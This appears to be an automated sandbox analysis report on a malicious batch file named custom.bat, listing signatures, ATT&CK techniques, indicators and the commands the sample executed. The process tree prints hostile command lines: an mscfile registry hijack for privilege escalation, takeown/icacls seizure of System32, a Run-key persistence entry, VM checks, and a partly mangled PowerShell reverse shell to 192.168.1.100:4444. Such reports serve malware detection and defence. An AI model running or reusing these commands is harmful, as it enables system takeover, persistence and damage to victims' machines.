396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

Analysis

max time kernel
110s
max time network
206s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08/09/2024, 06:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom.bat
Size

4KB
MD5

1c63745d54962d205bb3ae879bea1ed4
SHA1

a832c894a4e2b6d486c48b9ea6ec79d94df9537e
SHA256

396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
SHA512

129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
SSDEEP

96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Score

8^/10

discovery execution exploit persistence

Malware Config

Signatures

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
1344	takeown.exe
3972	takeown.exe
1296	icacls.exe
636	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	cmd.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1296	icacls.exe
636	icacls.exe
1344	takeown.exe
3972	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
464	powershell.exe
3008	powershell.exe
1148	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
992	timeout.exe
3068	timeout.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1400	systeminfo.exe
2548	systeminfo.exe
1836	systeminfo.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	cmd.exe
Key deleted	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command	reg.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1148	powershell.exe
1148	powershell.exe
464	powershell.exe
464	powershell.exe
464	powershell.exe
3008	powershell.exe
3008	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeTakeOwnershipPrivilege	1344	takeown.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeTakeOwnershipPrivilege	3972	takeown.exe
Token: SeDebugPrivilege	3008	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 4088 wrote to memory of 1084	4088	cmd.exe	84
PID 4088 wrote to memory of 1084	4088	cmd.exe	84
PID 4088 wrote to memory of 1148	4088	cmd.exe	85
PID 4088 wrote to memory of 1148	4088	cmd.exe	85
PID 4088 wrote to memory of 992	4088	cmd.exe	98
PID 4088 wrote to memory of 992	4088	cmd.exe	98
PID 4088 wrote to memory of 2660	4088	cmd.exe	99
PID 4088 wrote to memory of 2660	4088	cmd.exe	99
PID 4088 wrote to memory of 4872	4088	cmd.exe	100
PID 4088 wrote to memory of 4872	4088	cmd.exe	100
PID 4088 wrote to memory of 3068	4088	cmd.exe	103
PID 4088 wrote to memory of 3068	4088	cmd.exe	103
PID 4872 wrote to memory of 1344	4872	cmd.exe	104
PID 4872 wrote to memory of 1344	4872	cmd.exe	104
PID 4088 wrote to memory of 4508	4088	cmd.exe	106
PID 4088 wrote to memory of 4508	4088	cmd.exe	106
PID 4088 wrote to memory of 1400	4088	cmd.exe	107
PID 4088 wrote to memory of 1400	4088	cmd.exe	107
PID 4088 wrote to memory of 1664	4088	cmd.exe	108
PID 4088 wrote to memory of 1664	4088	cmd.exe	108
PID 4088 wrote to memory of 2548	4088	cmd.exe	111
PID 4088 wrote to memory of 2548	4088	cmd.exe	111
PID 4088 wrote to memory of 1128	4088	cmd.exe	112
PID 4088 wrote to memory of 1128	4088	cmd.exe	112
PID 4088 wrote to memory of 1836	4088	cmd.exe	113
PID 4088 wrote to memory of 1836	4088	cmd.exe	113
PID 4088 wrote to memory of 3820	4088	cmd.exe	114
PID 4088 wrote to memory of 3820	4088	cmd.exe	114
PID 4088 wrote to memory of 464	4088	cmd.exe	115
PID 4088 wrote to memory of 464	4088	cmd.exe	115
PID 4088 wrote to memory of 3508	4088	cmd.exe	116
PID 4088 wrote to memory of 3508	4088	cmd.exe	116
PID 4088 wrote to memory of 3972	4088	cmd.exe	117
PID 4088 wrote to memory of 3972	4088	cmd.exe	117
PID 4872 wrote to memory of 1296	4872	cmd.exe	118
PID 4872 wrote to memory of 1296	4872	cmd.exe	118
PID 4872 wrote to memory of 636	4872	cmd.exe	119
PID 4872 wrote to memory of 636	4872	cmd.exe	119
PID 4872 wrote to memory of 2360	4872	cmd.exe	120
PID 4872 wrote to memory of 2360	4872	cmd.exe	120
PID 4872 wrote to memory of 3008	4872	cmd.exe	121
PID 4872 wrote to memory of 3008	4872	cmd.exe	121

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4088
- C:\Windows\system32\mode.com
  mode con: cols=800 lines=60
  2⤵
  PID:1084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:992
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
  2⤵
  - Modifies registry class
  PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1344
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\* /grant Admin:F /t /c
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1296
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\* /grant Admin:F /t /c
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:636
- - C:\Windows\system32\mode.com
    mode con: cols=800 lines=60
    3⤵
    PID:2360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:3068
- C:\Windows\system32\reg.exe
  reg delete "HKCU\Software\Classes\mscfile" /f
  2⤵
  - Modifies registry class
  PID:4508
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:1400
- C:\Windows\system32\findstr.exe
  findstr /i "VirtualBox"
  2⤵
  PID:1664
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:2548
- C:\Windows\system32\findstr.exe
  findstr /i "VMware"
  2⤵
  PID:1128
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:1836
- C:\Windows\system32\findstr.exe
  findstr /i "Hyper-V"
  2⤵
  PID:3820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:464
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
  2⤵
  - Adds Run key to start application
  PID:3508
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\System32\* /r /d y
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:3972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a2b24af1492f112d2e53cb7415fda39f

SHA1
dbfcee57242a14b60997bd03379cc60198976d85

SHA256
fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

SHA512
9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
310c4040e72365ea4993113fd77611ce

SHA1
3dbdc46110454c95ef61e3e88d0e8cb7f90ea5a6

SHA256
11223ab7bdbe8d600e56b0d681f1c5109b7a8bd1bdf03a16975c8e77a8dd131f

SHA512
deae0c82677b8202d26faa751eeeac868050745d3aedc1ac297d13d6b92ce434e8d5c620eb39b8f87647ba0b9a8f46b89a14b664f6f9a58c5c03834c5afc5bee

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zg5jojtw.ckz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

Filesize
285B

MD5
4577f08330df24a350ff523ec87bf38e

SHA1
5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

SHA256
5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

SHA512
ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

Download Submit
memory/1148-0-0x00007FF80A7A3000-0x00007FF80A7A5000-memory.dmp

Filesize
8KB

Download
memory/1148-6-0x0000020EDC8B0000-0x0000020EDC8D2000-memory.dmp

Filesize
136KB

Download
memory/1148-11-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

Filesize
10.8MB

Download
memory/1148-12-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

Filesize
10.8MB

Download
memory/1148-15-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

Filesize
10.8MB

Download